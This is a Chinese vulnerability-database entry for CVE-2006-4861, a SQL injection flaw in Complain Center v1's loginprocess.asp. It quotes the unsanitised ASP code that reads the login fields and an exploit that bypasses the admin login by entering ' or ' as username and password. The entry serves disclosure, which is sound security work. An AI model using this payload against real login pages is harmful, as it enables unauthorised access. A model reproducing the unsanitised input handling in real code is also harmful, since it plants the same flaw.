Mohammed Mehdi Panjwani Complain Center 'loginprocess.asp'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193457 漏洞类型 SQL注入
发布时间 2006-09-19 更新时间 2006-09-19
CVE编号 CVE-2006-4861 CNNVD-ID CNNVD-200609-339
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/83656
https://cxsecurity.com/issue/WLB-2006090129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-339
|漏洞详情
MohammedMehdiPanjwaniComplainCenter1的loginprocess.asp中存在SQL注入漏洞,远程攻击者可以通过login.asp中的(1)TxtUser(也称为Username)和(2)TxtPass(也称为Password)参数执行任意SQL命令。
|漏洞EXP
ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:

..

...

dim varUser

dim varPass

varUser=Request.Form("TxtUser") No Secure : )

varPass=Request.Form("TxtPass") No Secure : )

..

...

//Before join login page

http://[target]/[path]/login.asp

Username : ' or '

Password : ' or ' and Login Ok

# ajann,Turkey
|受影响的产品
Mohammed Mehdi Panjwani Complain Center 1
|参考资料

来源:BUGTRAQ
名称:20060914ComplainCenterv1(loginprocess.asp)AdminByPASSSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/446078/100/0/threaded
来源:SREASON
名称:1601
链接:http://securityreason.com/securityalert/1601